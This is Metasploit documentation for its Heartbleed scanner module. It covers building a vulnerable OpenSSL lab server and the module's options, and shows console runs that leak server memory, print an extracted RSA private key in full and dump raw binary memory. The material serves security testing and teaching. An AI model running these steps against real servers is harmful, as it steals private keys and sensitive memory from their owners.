metasploit-framework/documentation/modules/auxiliary/scanner/ssl/openssl_heartbleed.md

28 KiB
Raw Permalink Blame History

Vulnerable Application

The heartbleed bug was extremely well documented, but essentially boils down to a client being able to specify how much memory is retrieved from the server when performing a TLS heartbeat. This results in an arbitrary memory read, where an attacker is able to read the contents of memory.

Install OpenSSL 1.0.1d on Ubuntu 18.04

The following commands will download OpenSSL 1.0.1d, build and install it. Finally, we'll use the built in s_server to start the service to be scanned. install_sw is used to prevent an install error.

sudo apt-get install build-essential
wget https://www.openssl.org/source/old/1.0.1/openssl-1.0.1d.tar.gz
tar -zxf openssl-1.0.1d.tar.gz && cd openssl-1.0.1d
./config
sudo make
sudo make install_sw
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
/usr/local/ssl/bin/openssl s_server -key key.pem -cert cert.pem -accept 44330 -www

If you receive gethostbyname failure error in openssl, add the client (metasploit) IP and hostname to your hosts file.

Using docker

Using the environment created by vulhub

First create a new docker-compose file:

version: '2'
services:
 nginx:
   image: vulhub/openssl:1.0.1c-with-nginx
   ports:
    - "8080:80"
    - "8443:443"

Then run docker-compose up and verify that the service is running with:

$ curl https://localhost:8443 -k
<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.11.13</center>
</body>
</html>

Verification Steps

  1. Install a vulnerable OpenSSL, start the service
  2. Start msfconsole
  3. Do: use auxiliary/scanner/ssl/openssl_heartbleed
  4. Do: set rhosts [ip]
  5. Do: set action [ACTION]
  6. Do: run

Options

Action

  • SCAN: Scan the host to see if it is vulnerable. If verbose is set to true, also print the memory that was dumped. This is the default.
  • DUMP: Dump the memory and store it as loot.
  • KEYS: Similar to DUMP but scan the results for the private key.

TLS_CALLBACK

Protocol to use if a specific underlying protocol is required. Default is None.

TLS_VERSION

The specific version of TLS (or SSL) to use, if only specific ones are available. Defaults to 1.0 (TLS1.0).

MAX_KEYTRIES

If Action is set to KEYS, the maximum amount of times to dump memory and attempt to retrieve the private key. Similar to LEAK_COUNT but only applies to KEYS. Default is 50.

STATUS_EVERY

If Action is set to KEYS, how often the status should be printed. Default is 5.

DUMPFILTER

A regular expression (used in scan function) to use to filter the dump before storing. Default is nil.

RESPONSE_TIMEOUT

How long to wait for the server to respond in seconds. Default is 10.

LEAK_COUNT

If Action is set to SCAN or DUMP, the maximum amount of times to dump memory. Similar to MAX_KEYTRIES. Default is 1.

Advanced Options

HEARTBEAT_LENGTH

How much memory should attempt to be retrieved. Default is 65535.

XMPPDOMAIN

If jabber is selected for TLS_CALLBACK, the domain to use. Default is localhost.

Scenarios

SCAN against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d

With the default action of SCAN we can determine if the server is vulnerable or not.

msf5 > use auxiliary/scanner/ssl/openssl_heartbleed 
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts 222.222.2.222
rhosts => 222.222.2.222
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 44330
rport => 44330
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run

[+] 222.222.2.222:44330   - Heartbeat response with leak, 65535 bytes
[*] 222.222.2.222:44330   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

KEYS against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d

In order to help elicit the keys, we can run the following code to help populate memory with the keys:

watch 'cat openssl-1.0.1d/key.pem; cat openssl-1.0.1d/cert.pem'
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action KEYS
action => KEYS
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run

[*] 222.222.2.222:44330   - Scanning for private keys
[*] 222.222.2.222:44330   - Getting public key constants...
[*] 222.222.2.222:44330   - 2019-10-13 01:32:17 UTC - Starting.
[*] 222.222.2.222:44330   - 2019-10-13 01:32:17 UTC - Attempt 0...
[+] 222.222.2.222:44330   - 2019-10-13 01:32:18 UTC - Got the private key
[*] 222.222.2.222:44330   - -----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA7ax3L0LRt5uZQTFOiJkX2xRn9ww/G87gMkMBAdeEzph7a2/i
C4stnajh9NsUbACv+dt8mtwgh0Vg4lMaI5iB9lXlqfsR17vIsW+/AZXj3Eo+B0QU
l8MpVilDvm3Hee0tE9NGLMR+Vk1Eq0UL+w7Gc/IswkFtj8XGMQ3Jc6OaJ6Ofh5hF
VlmyQBrtwvZ/20g5KtMbZFv1XX28bjEd47qfTo8nrnCsrjD7h7R42GrRw9hhvWse
sEa9VyTwQF0W8mxTYFx/7evXeJNVw1drmhJrxpGfb9gl8qzQgf6PQoi1LXaPAdk5
1cshKeGXmcA+1FR5HOdvWEqzCjMxApzdExNSgwIDAQABAoIBACmdYAT7ayL98JiU
nI6YV6/5Y7bDAy3ITEMgrkV3Sf6ufjWykl65ENShJGcuEOZUPHvALZIj5uIoiK04
JcSDyIWsRpk7p8UhUSOYUFZju1DwAupcxkpIVq2Kbh0itaGooJLvFEN0aDaOMu7W
GSHtVVwp1CJzOE7LL0eZhWNlCvHTgwwobaAUYEyrDmkOdWskMC3RGu5JrrfKTK+5
VUwMMAJ7Wf+d+xeTrNHwGGdEvHd23p1B1E3+axG0XqxI7wODz14iAWgd1zp2gSq2
Ji/II0E8Okwl3AR0d8SD0cJeEPHWlrr/6LzBUTHanDBGe2SXP/SMFSvyEpoPw/s8
vovI1okCgYEA8Ju7TuE4V2UQjZi8qcNAFnbxfcS9bk8S+BBKkgKtMY6wZT8h03fP
ouYot1IaRxMVlErrUeVtD/YKD+nhNFFYZGCSChjAhvf1rq/wzRILWpdGZ3SF9UuR
NlNpH1DcVZPOdTxCJ8DfjY72m/ugYysorQdmo9L58BhMKbfp9aHOR0cCgYEA/OCs
73xWEECKS7of0B+3CKriYT7fROu5wP9gFl3/FR8q7275TG2Iwg0rDz4NLGJhcVQ8
4bNAz+OglxqXkIVOf5Cuj8DibAw2JTr+MP5wQUaB0fPdwPcNw/fBq68x/+UpdcM2
B98b2uykN3Q2Zd2g3VVrKUOb4yJlE1EEvVrt8OUCgYEAq6oQe3jIn+Hla4D7qgs6
IE0AgwDpPliAaigFbCMoumDZjYL7eUrUA58+kXysbuU40jKZrjaIF4ktKKlvGcqn
zAXya+24/xLOYLH6lfU30Ix5mLpUEOy3UBE2wTcJ3Ky18oLpmD9NwEutuyBOEDLs
tHbBTkTqOdi8Dk+/RpcI+2UCgYEAj5qDeqiwMyCDqMd0w3sPNTPdxP2wSvJWlVww
0+LjNbpyZnAt0JIvZIuX1VsWngrsbTA6Nq3V83i/vK+UPLUHQ/gEuYv+yP8STIg4
y9fiJZ+Fn5YOa0OhJJVw/S9LhJc9uSt3Znbz2ZojE37CWYzHiom0hkVnpE/m+FY9
C880amUCgYAw8b+F3iBCEzioeUWW62c89yQaV0Ci/BQgvkhLsRRZr5hlt8+NWjSv
Nx2YT7eEcEIMOzOYF0zUH/gLo7UbZXGk/GlupqWP7kumwALz5Hu3gnx5+c69A0yL
FbawD4i1LZxrihOuuy3nt34hIlprjtW2WV49NiWnbwEzZo6ejm5NRg==
-----END RSA PRIVATE KEY-----

[*] 222.222.2.222:44330   - Private key stored in /root/.msf4/loot/20191012213218_default_222.222.2.222_openssl.heartble_250185.txt
[*] 222.222.2.222:44330   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

DUMP against s_server on Ubuntu 18.04 with OpenSSL 1.0.1d

msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set action DUMP
action => DUMP
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > run

[+] 222.222.2.222:44330   - Heartbeat response with leak, 65535 bytes
[+] 222.222.2.222:44330   - Heartbeat data stored in /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin
[*] 222.222.2.222:44330   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > cat /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin
[*] exec: cat /root/.msf4/loot/20191012213447_default_222.222.2.222_openssl.heartble_500776.bin

<0A><><EFBFBD>]<5D>O<EFBFBD><4F><EFBFBD>g<EFBFBD>hE<68>_.[<5B>MT<4D><54>b<EFBFBD><62>΋k<CE8B>f<EFBFBD><66>
<0A>"<22>!98<39><38><EFBFBD><EFBFBD>5<EFBFBD><35><EFBFBD><EFBFBD>
<0A><>	<09><>32<33><32>ED<45><44>/<2F>A<EFBFBD><41><EFBFBD>
                        <20>      <20>@<40>DA8u-<2D>	b<>,<2C><>Y'L<><4C>Մ<EFBFBD>ձ3<D5B1><33>-<2D>bt<62><74><EFBFBD><EFBFBD>`<60>;ˋz<CB8B><7A><EFBFBD>4<EFBFBD><34><EFBFBD>
<0A>`<60><><EFBFBD>w<EFBFBD><77>Vnvv<76>x<EFBFBD><78><EFBFBD>'<27>`<60><><EFBFBD>Y$<24>H                                                         |<7C><>k	E<><45>ޞ=A<>Gx<47>A<EFBFBD><41>
                           a<><61>f<EFBFBD>D<EFBFBD>9I<39><49>W<EFBFBD>ϋ3/<2F>V<EFBFBD>s<EFBFBD>D%<25><><EFBFBD><EFBFBD>|<7C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Z;<3B><>1FF<46><46><EFBFBD>)<29>vC<76><43><EFBFBD>ny7m<37><6D>N1v/<2F>&<26>Y<EFBFBD>T@<40><>e<EFBFBD>3<EFBFBD>D<EFBFBD>ʗ<EFBFBD>O<EFBFBD><4F>pc<70><63>,<2C>y<EFBFBD><79>q<EFBFBD>G<EFBFBD>g<EFBFBD><67>z<EFBFBD><7A>`^<5E>s<EFBFBD>Mk*<2A><><EFBFBD><EFBFBD>Ou<4F><75><EFBFBD>E<EFBFBD><EFBFBD><E3819C><EFBFBD>l]<5D>%<,<2C>@<40><>S<EFBFBD>зN<D0B7>	"<22><><EFBFBD><EFBFBD><EFBFBD>"<22><><EFBFBD>ct{uj<75><6A>Ц<EFBFBD>*N<><4E><EFBFBD>a\{<7B>5vRNW<4E><57>-4S<34>^0b<30>e<EFBFBD><65>7<EFBFBD><37><EFBFBD>=r<><72><EFBFBD>J>D<><44>)V)C<>m<EFBFBD>y<EFBFBD>-<2D>F,<2C>~VMD<4D>E
<0A>s<EFBFBD><73>'<27><><EFBFBD><EFBFBD>EVY<56>@<40><><EFBFBD><EFBFBD><EFBFBD>H9*<2A>[<5B>]}<7D>n1㺟N<E3BA9F>'<27>p<EFBFBD><70>0<EFBFBD><30><EFBFBD>x<EFBFBD>j<EFBFBD><6A><EFBFBD>a<EFBFBD>k<EFBFBD>F<EFBFBD>W$<24>@]<5D>lS`\<5C><><EFBFBD>x<EFBFBD>U<EFBFBD>Wk<57><6B>o<EFBFBD>%<25>Ё<EFBFBD><D081>B<EFBFBD><42>-v<><76>9<EFBFBD><39>!)ᗙ<>><3E>Ty<54>oXJ<58>
31<33><31>R<EFBFBD><52>S0Q0U<30>]<5D>v%C<><43>#<23><>*<2A>B|c
K0U#0<><30>]<5D>v%C<><43>#<23><>*<2A>B|c
K0U<30>0<EFBFBD>0 *<2A>H<EFBFBD><48>
<0A><><EFBFBD>^<5E><>#
       怅W7<57><37>G<EFBFBD>w<EFBFBD>n<EFBFBD>*wFcR<63>~<7E><><EFBFBD><EFBFBD>l8<6C>C*]<5D><>@<40><>g+;=<3D>|8<>b߬3

1<>ŏmA<6D>,<2C>s<EFBFBD><73>l1v<31>d<EFBFBD><64><EFBFBD><EFBFBD>m<EFBFBD>i^<5E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>y<EFBFBD>}<7D><><EFBFBD><EFBFBD>5<EFBFBD>2<EFBFBD><32>'<27><>s<EFBFBD>M<EFBFBD><4D><EFBFBD><EFBFBD>G <20>U<EFBFBD>2[<5B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>N<EFBFBD>^p](<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>*\<5C><>3(ic<69>U<EFBFBD><55>{<7B>
           E<>DMV~<7E>,F<>-<2D>y<EFBFBD>m<EFBFBD>C)V)×D>J<><4A><EFBFBD>o<EFBFBD>Ȼ<EFBFBD><C8BB><EFBFBD><EFBFBD>U<EFBFBD><55><EFBFBD>#<23>S<EFBFBD>`E<> ܚ|<7C><><EFBFBD>l<EFBFBD><6C>᨝-<2D>
                                                                    <20>ok{<7B>΄<EFBFBD>C2<43><32>
                                                                               <20>g<EFBFBD><67><EFBFBD>N1A<31><41><EFBFBD><EFBFBD>B/w<><77>!<21><>)<29>U<EFBFBD><55><EFBFBD>B/w<><77><EFBFBD><EFBFBD><EFBFBD>)<29>U<EFBFBD>#<23>%<25><>\ <20>rV<72><56><EFBFBD>A#<23><>_
                                                                                                                                       <20>m&r<>]<5D>J<EFBFBD>
;<3B><><EFBFBD>/_<><5F>
<0A><><EFBFBD>rD<72><44><EFBFBD>WMZt0<74><30><EFBFBD><><CA9F><EFBFBD><EFBFBD>J<EFBFBD>bB<62>U

|<7C>ƭ<EFBFBD><C6AD><EFBFBD>6<EFBFBD><36><EFBFBD>,s<>d<EFBFBD><64>7<EFBFBD>s<EFBFBD>8$,<2C>I|<7C><>'<27><20>X<EFBFBD><58>j<EFBFBD>%<25><><EFBFBD><EFBFBD>uj}<7D><>Y<EFBFBD>a'<27>Ks<4B><73>V<EFBFBD><56>c.<2E><><EFBFBD>vn:
B<><42><EFBFBD>c<EFBFBD><63>q)GL<47>y0T<30>a&aZ<61>*q/#<23><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)<29><>-<2D><><EFBFBD><EFBFBD>ހYi<59>R3<52>rb)<29><>
<0A><><EFBFBD><EFBFBD><EFBFBD>5E<35><45><EFBFBD><EFBFBD>X?3w`><3E>"<22><>p<EFBFBD><EFBFBD>Φ<EFBFBD><CEA6><EFBFBD><EFBFBD>q<EFBFBD>/<2F>}=9<><39><EFBFBD><EFBFBD>'<27>PuJ<75>]<5D>ȝ?l<>]<5D>cR$<24><><EFBFBD><EFBFBD>-m<><6D><EFBFBD>H,<2C>D^<5E><>Ș{<7B><>5x<35><78>oS<6F><53><EFBFBD>-<2D>ݴ;<3B>v<EFBFBD><76>]<5D><>I@<40><>Á<EFBFBD>K7H<37><48>
                                                                                                              i<>,<2C>ut<75>~<7E>
                                                                                                                       ߃<><DF83>u*n<><6E>w<EFBFBD><77><EFBFBD><EFBFBD>.<2E>fU<66><55><EFBFBD>	R<>X<EFBFBD><58>y<EFBFBD><79>^<5E><>|<7C>0<EFBFBD><30>udh<64><68><EFBFBD><EFBFBD>F<EFBFBD><46><EFBFBD><EFBFBD><EFBFBD><EFBFBD>><3E><>-<2D><>y<EFBFBD>n<EFBFBD>Š<EFBFBD><EFBFBD>1<EFBFBD><31>P<EFBFBD><50><EFBFBD><EFBFBD><EFBFBD>W
                                                <20><>Ii<49><69><EFBFBD><EFBFBD><EFBFBD>/<2F>|<7C><>+<2B>l)Nv<4E>c<EFBFBD>3<EFBFBD>U7<55><37>Xud@<40>o<EFBFBD><6F>z<EFBFBD>(Lk <20><>0R|7<><37><EFBFBD>5<EFBFBD>j^%<25><><EFBFBD><EFBFBD>'L;S,"<22><><EFBFBD><EFBFBD><EFBFBD>5	ӕv<D395>;{q)<29>W<EFBFBD>
                                                                                                                                          zJX<4A><58>>j<>;<3B><>f<EFBFBD><66>t<EFBFBD><74>DQ<44>Ez/<2F>Rݜ13
1<>ŏmA<6D>,<2C>s<EFBFBD><73><EFBFBD><EFBFBD>)!<21><>9<EFBFBD><39>v-<2D><>B<EFBFBD><42><EFBFBD>Ь<EFBFBD>%<25>o<EFBFBD><6F><EFBFBD>k<EFBFBD>kW<6B>U<EFBFBD>x<EFBFBD><78><EFBFBD>\`Sl<53>]@<40>$W<>F<EFBFBD>k<EFBFBD>a<EFBFBD><61><EFBFBD>j<EFBFBD>x<EFBFBD><78><EFBFBD>0<EFBFBD><30>p<EFBFBD>'<27>N<EFBFBD><4E><EFBFBD>1n<31>}]<5D>[d*9H<39><48><EFBFBD><EFBFBD><EFBFBD>@<40>YVE<56><45><EFBFBD><EFBFBD>'<27><>s<EFBFBD>
           E<>DMV~<7E>,F<>-<2D>y<EFBFBD>m<EFBFBD>C)V)×D>J<><4A><EFBFBD>o<EFBFBD>Ȼ<EFBFBD><C8BB><EFBFBD><EFBFBD>U<EFBFBD><55><EFBFBD>#<23>S<EFBFBD>`E<> ܚ|<7C><><EFBFBD>l<EFBFBD><6C>᨝-<2D>
                                                                    <20>ok{<7B>΄<EFBFBD>C2<43><32>
                                                                               <20>g<EFBFBD><67><EFBFBD>N1A<31><41><EFBFBD><EFBFBD>B/w<><77>q<EFBFBD><71>)<29>U!<21>Ɠ)<29>U<EFBFBD><55><EFBFBD>)<29>`0<><30>)<29>U<EFBFBD>@ɓ)<29>U!`<60><>)<29>U!@<40><>)<29>U!@<40><>)<29>U<EFBFBD><55><EFBFBD>B/w<><77>1<EFBFBD><31>5E<35><45><EFBFBD><EFBFBD>X?3w`><3E>"<22><>p<EFBFBD><EFBFBD>Φ<EFBFBD><CEA6><EFBFBD><EFBFBD>q<EFBFBD>/<2F>}=9<><39><EFBFBD><EFBFBD>'<27>PuJ<75>]<5D>ȝ?l<>]<5D>cR$<24><><EFBFBD><EFBFBD>-m<><6D><EFBFBD>H,<2C>D^<5E><>Ș{<7B><>5x<35><78>oS<6F><53><EFBFBD>-<2D>ݴq<DDB4><71><EFBFBD>)<29>U!<21><>)<29>U<EFBFBD><55>8NE<<3C><><EFBFBD>GGΡ<47><CEA1>)L<><4C>ңf<D2A3>(+c<><63><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>'B<uΓU<CE93>PiS6<53>K<EFBFBD><4B>tgF<67>Z
       <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
<0A>`dXQ4<51><34>
<0A>m<EFBFBD>Q<EFBFBD>J<EFBFBD>G<EFBFBD>R<EFBFBD>(<28><>w<EFBFBD>!?e<><65>1<EFBFBD><31>J<EFBFBD>On<4F><6E>}<7D>v@é<><C3A9><EFBFBD>eW8<57>N<EFBFBD><4E><EFBFBD>p3<70>)<29>U A<><41><EFBFBD>)<29>U  <20><><EFBFBD>@'<27>/1<><31><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>1<EFBFBD><31><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>1<EFBFBD><31><EFBFBD><EFBFBD>oI,<2C>Щ<EFBFBD><D0A9><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>\<5C>ͭ<EFBFBD>r<EFBFBD><72>&<26>1<EFBFBD><31><EFBFBD><EFBFBD><EFBFBD>w<EFBFBD>ۯ<EFBFBD>H<EFBFBD><48>#
G<>eO<65>IB<49><42><EFBFBD><EFBFBD><EFBFBD>u1<75>X<EFBFBD>^<5E>v<EFBFBD>ͭ|Q<><51>^<5E><>v<EFBFBD>XC8<43><38>'a<>Yu<59><75><EFBFBD>!࿕)<29>U1<55>Y<EFBFBD>"&<26>
                                                       <20><><EFBFBD><EFBFBD>
                                                           <20><><EFBFBD><EFBFBD>A<EFBFBD><41>W<EFBFBD><57>GЊ!<21><><EFBFBD>)<29>U<EFBFBD>\7ڊ!p<><70>)<29>U<EFBFBD><55><EFBFBD>)<29>U  `<60><>)<29>U<EFBFBD>\7ڊ!<21><>)<29>U<EFBFBD>\7ڊ!p<><70>)<29>U<EFBFBD>\7ڊ! <20><>)<29>U0<55><30>)<29>U  P<><50>)<29>U<EFBFBD>\<5C><><EFBFBD><EFBFBD>сFAp<41>0<EFBFBD>:%6U<36>\7ڊ!<21><><EFBFBD>)<29>U<EFBFBD>\7ڊ  <20>\7ڊ!<21>\7ڊ <20><>)<29>U 01<30><31><EFBFBD>)<29>U1<55><31><EFBFBD>)<29>UA<55>)<29>UA0)<29>UAapד)<29>U1<55><31><EFBFBD>)<29>U<EFBFBD><55><EFBFBD><EFBFBD>Z<EFBFBD>Qe"<22>C)kUݠ<55>e6t7<74><37><EFBFBD>6<EFBFBD>u)<29><>1<EFBFBD><31><EFBFBD><EFBFBD><EFBFBD>
mL<6D>n<EFBFBD>*<2A>]`<60><><EFBFBD><EFBFBD>D<EFBFBD>>a<><61><EFBFBD>K<EFBFBD>@V|<7C><><EFBFBD><EFBFBD><EFBFBD>Õ)<29>U<<3C><><EFBFBD>!<21>!b<><62>{<7B><><EFBFBD><EFBFBD>C<EFBFBD>M>
[<5B><><EFBFBD><EFBFBD>A8<41>%<25><><41><CEB8><EFBFBD><EFBFBD><EFBFBD>ŪY<C5AA>6K                              <20><><55>
                       <20><>XA<58><41>5j<35>X<EFBFBD><58>q<EFBFBD>'}<7D><>c<EFBFBD>u<EFBFBD><75><EFBFBD>Ͷ<EFBFBD>W<EFBFBD><57><EFBFBD>9<EFBFBD>*5<><35><EFBFBD><EFBFBD><EFBFBD><EFBFBD>g<EFBFBD>3<EFBFBD><33>Q	<09>a7ڊ<37>a7ڊ<37>ĕ)<29>U<EFBFBD>ĕ)<29>UP	<09>W<EFBFBD><57>(E <20><>
[&(yu0<75>.<2E><><EFBFBD>I<EFBFBD>V<EFBFBD><56><EFBFBD>t<EFBFBD>1<EFBFBD><31>fE<66>I̮N;<3B><><70>]<5D>2<EFBFBD>&^}        <20><> #<23><><EFBFBD><EFBFBD>Ƃ<EFBFBD>T<EFBFBD>|i2<69>&~<<3C>Q;T<>B<EFBFBD>TAﴕ:<3A>/<2F><>H<EFBFBD>^W<><57>x<EFBFBD><78><EFBFBD><EFBFBD><EFBFBD>]͓!<21><>@@c7ڊ@c7ڊPd<50>)<29>UPd<50>)<29>Ulocalhost
::1		localhost6.localdomain6	localhost6
111.111.1.111   client

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
<0A><> <%<25>N<EFBFBD>O#&<26><><EFBFBD>+-91<39><31>,<2C>q<EFBFBD><71>k<EFBFBD>sNV^I<>
<0A>n
  jgd0<64>`*<2A>H<EFBFBD><48>	<09><>y<EFBFBD>M<EFBFBD>,0
0E1
   0	UAU10U

Some-State1!0U

201011031638Z0E1 Pty Ltd0
                0	UAU10U

Some-State1!0U

<0A>0<EFBFBD>ernet*<2A>H<EFBFBD><48>its Pty Ltd0<64>"0
<0A><><EFBFBD>w/Bѷ<42><D1B7>A1N<31><4E><EFBFBD>g<EFBFBD>
                 ?<3F>2CׄΘ{ko<6B>
                          <20>-<2D><><EFBFBD><EFBFBD><EFBFBD>l<EFBFBD><6C><EFBFBD>|<7C><> <20>E`<60>S<EFBFBD>#<23><><EFBFBD>U<EFBFBD><55>׻ȱo<C8B1><6F><EFBFBD><EFBFBD>J>D<><44>)V)C<>m<EFBFBD>y<EFBFBD>-<2D>F,<2C>~VMD<4D>E
<0A>s<EFBFBD><73>'<27><><EFBFBD><EFBFBD>EVY<56>@<40><><EFBFBD><EFBFBD><EFBFBD>H9*<2A>[<5B>]}<7D>n1㺟N<E3BA9F>'<27>p<EFBFBD><70>0<EFBFBD><30><EFBFBD>x<EFBFBD>j<EFBFBD><6A><EFBFBD>a<EFBFBD>k<EFBFBD>F<EFBFBD>W$<24>@]<5D>lS`\<5C><><EFBFBD>x<EFBFBD>U<EFBFBD>Wk<57><6B>o<EFBFBD>%<25>Ё<EFBFBD><D081>B<EFBFBD><42>-v<><76>9<EFBFBD><39>!)ᗙ<>><3E>Ty<54>oXJ<58>
31<33><31>R<EFBFBD><52>S0Q0U<30>]<5D>v%C<><43>#<23><>*<2A>B|c
K0U#0<><30>]<5D>v%C<><43>#<23><>*<2A>B|c
K0U<30>0<EFBFBD>0 *<2A>H<EFBFBD><48>
<0A><><EFBFBD>^<5E><>#
       怅W7<57><37>G<EFBFBD>w<EFBFBD>n<EFBFBD>*wFcR<63>~<7E><><EFBFBD><EFBFBD>l8<6C>C*]<5D><>@<40><>g+;=<3D>|8<>b߬3

<0A>Ѓ<EFBFBD><D083><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"<22>l1v<31>d<EFBFBD><64><EFBFBD><EFBFBD>m<EFBFBD>i^<5E><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>y<EFBFBD>}<7D><><EFBFBD><EFBFBD>5<EFBFBD>2<EFBFBD>K?<3F>!<21><>M<EFBFBD><4D><EFBFBD><EFBFBD>G <20>U<EFBFBD>2[<5B><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>N<EFBFBD>^p](<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>*\<5C><>3(ic<69>U<EFBFBD><55>{<7B>
                                           GA8u-<2D>	b<>,<2C><>Y'L<><4C>Մ<EFBFBD>ձ3<D5B1><33>-<2D>bt<62><74><EFBFBD><EFBFBD>`<60>;ˋz<CB8B><7A><EFBFBD>4<EFBFBD><34><EFBFBD>
<0A>`<60><><EFBFBD>w<EFBFBD><77>Vnvv<76>x<EFBFBD><78><EFBFBD>'<27>`<60><><EFBFBD>Y$<24>H                                                                 |<7C><>k	E<><45>ޞ=A<>Gx<47>A<EFBFBD><41>
                           a<><61>f<EFBFBD>D<EFBFBD>9I<39><49>W<EFBFBD>ϋ3/<2F>V<EFBFBD>s<EFBFBD>D%<25><><EFBFBD><EFBFBD>|<7C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Z;<3B><>1FF<46><46><EFBFBD>)<29>vC<76><43><EFBFBD>ny7m<37><6D>N1v/<2F>&<26>Y<EFBFBD>T@<40><>e<EFBFBD>3<EFBFBD>D<EFBFBD>ʗ<EFBFBD>O<EFBFBD><4F>pc<70><63>,<2C>y<EFBFBD><79>q<EFBFBD>G<EFBFBD>g<EFBFBD><67>z<EFBFBD><7A>`^<5E>s<EFBFBD>Mk*<2A><><EFBFBD><EFBFBD>Ou<4F><75><EFBFBD>E<EFBFBD><EFBFBD><E3819C><EFBFBD><EFBFBD>n<EFBFBD><6E>=*<2A><>LX-<2D>*N<><4E><EFBFBD>a\{<7B>5vRNW<4E><57>-4S<34>^0b<30>e<EFBFBD><65>7<EFBFBD><37><EFBFBD>=r+A`d<>)<29>Upt<70>)<29>U@q<>U<EFBFBD><55><EFBFBD>)<29>U0;<3B>)<29>U1<55><31><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><31>)bߜؐ0<D890>x<EFBFBD><78><EFBFBD>.!<21><> <20><>4H<34><30><DC8A><EFBFBD><EFBFBD><EFBFBD>\<5C>A<EFBFBD><41><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
G<>eO<65>IB<49>*<2A>H<EFBFBD><48>@q<>	<09><>y<EFBFBD>M<EFBFBD>,0
0E1
   0	UAU10U

Some-State1!0U

201011031638Z0E1 Pty Ltd0
                0	UAU10U

Some-State1!0U

<0A>0<EFBFBD>ernet*<2A>H<EFBFBD><48>its Pty Ltd0<64>"0
<0A><><EFBFBD>w/Bѷ<42><D1B7>A1N<31><4E><EFBFBD>g<EFBFBD>
                 ?<3F>2CׄΘ{ko<6B>
                          <20>-<2D><><EFBFBD><EFBFBD><EFBFBD>l<EFBFBD><6C><EFBFBD>|<7C><> <20>E`<60>S<EFBFBD>#<23><><EFBFBD>U<EFBFBD><55>׻ȱo<C8B1><6F><EFBFBD><EFBFBD>J>D<><44>)V)C<>m<EFBFBD>y<EFBFBD>-<2D>F,<2C>~VMD<4D>E
<0A>s<EFBFBD><73>'<27><><EFBFBD><EFBFBD>EVY<56>@<40><><EFBFBD><EFBFBD><EFBFBD>H9*<2A>[<5B>]}<7D>n1㺟N<E3BA9F>'<27>p<EFBFBD><70>0<EFBFBD><30><EFBFBD>x<EFBFBD>j<EFBFBD><6A><EFBFBD>a<EFBFBD>k<EFBFBD>F<EFBFBD>W$<24>@]<5D>lS`\<5C><><EFBFBD>x<EFBFBD>U<EFBFBD>Wk<57><6B>o<EFBFBD>%<25>Ё<EFBFBD><D081>B<EFBFBD><42>-v<><76>9<EFBFBD><39>!)ᗙ<>><3E>Ty<54>oXJ<58>
31<33><31>R<EFBFBD><52>S0Q0U<30>]<5D>v%C<><43>#<23><>*<2A>B|c
K0U#0<><30>]<5D>v%C<><43>#<23><>*<2A>B|c
K0U<30>0<EFBFBD>0 *<2A>H<EFBFBD><48>
<0A><><EFBFBD>^<5E><>#
       怅W7<57><37>G<EFBFBD>w<EFBFBD>n<EFBFBD>*wFcR<63>~<7E><><EFBFBD><EFBFBD>l8<6C>C*]<5D><>@<40><>g+;=<3D>|8<>b߬3

